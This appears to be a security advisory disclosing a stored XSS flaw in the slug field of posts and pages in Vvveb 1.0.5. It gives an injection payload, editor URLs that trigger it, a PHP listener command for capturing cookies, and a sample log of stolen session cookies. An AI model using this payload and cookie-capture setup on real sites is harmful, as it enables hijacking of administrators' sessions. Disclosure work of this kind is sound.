Vvveb 1.0.5 | Authenticated Stored XSS on creating posts & pages
Information
| Software Type | Web App |
|---|---|
| Software Name | Vvveb |
| Affected Version | 1.0.5 |
| Software Vendor | Vvveb |
| Software Link | https://github.com/givanz/Vvveb |
| Severity | High |
| CVSS Score | 8.0 |
| CVE Link | Pending |
| Affected Assets | 163+ |
| Date of Discovery | Jan 3rd, 2025 |
| PoC Exploit | https://gist.github.com/0xHamy/b2674eeffd1f73af96d29f152c47bcbd |
Description
The endpoint at [/vadmin123/index.php?module=content/post&type=post] and [/vadmin123/index.php?module=content/posts&type=page] is vulnerable to XSS, an attacker can trigger XSS by injecting malicious code into slug parameter.
The payload can be triggered by editing the post/page or by using drag and drop designer.
Both endpoints are accessible by an editor and can be used to inject malicious XSS to steal cookies of other site admins, editors or even super admins.
Reproduce
To reproduce the issue, navigate to any of these endpoints to view posts or pages:
http://127.0.0.1/vadmin123/index.php?module=content/posts&type=post
http://127.0.0.1/vadmin123/index.php?module=content/posts&type=page
Edit a post or a page (both are very similar):
http://127.0.0.1/vadmin123/index.php?module=content/post&post_id=6&type=post
http://127.0.0.1/vadmin123/index.php?module=content/post&post_id=14&type=page
Insert the following payload in slug and save the page:
"><img src='http://127.0.0.1:1718/capture.php'>Once the page reloads, the code will be executed. Additionally, this can be triggered if other moderators/admins were to click on the post, clicking the post/page directly opens it in edit mode:
http://127.0.0.1/vadmin123/index.php?module=content/post&post_id=6&type=post
It can also be triggered if you open the post using drag and drop editor:
http://127.0.0.1/vadmin123/?module=editor/editor&name=Mauris+viverra+cursus+ante+laoreet+eleifend&url=//127.0.0.1/%22%3E%3Cimg%20src=%27http://127.0.0.1:1718/capture.php%27%3E&template=content/post.html
Additionally, it can be triggered if you just open endpoint in drag and drop editor just by its name:
http://127.0.0.1/vadmin123/?module=editor/editor&name=Mauris+viverra+cursus+ante+laoreet+eleifend
This is useful because it doesn't show the payload but executes it anyway.
Cookie stealing
To steal cookies, I created the following php script:
https://gist.github.com/0xHamy/b2674eeffd1f73af96d29f152c47bcbd
Save this into a capture.php file and then start php start with the following command:> php -S 0.0.0.0:1718
This saves cookies to a file named cookie_log.txt, cookies are saved with a timstamp:[2025-01-03 18:09:17] Cookies: _ga_90PNJH7CQ5=GS1.1.1735826854.1.1.1735826858.0.0.0; _ga=GA1.1.305814098.1735826855; PHPSESSID=EzuO8BB8K7BLfydEIx%2C1De1mJA3ONYvZBOIhjeXt-syZFn0%2C; user=1
Cookies can later be used to access admin or another site moderator's account.
Proof of Concept (PoC) Video
Posted on: January 10, 2025 10:36 PM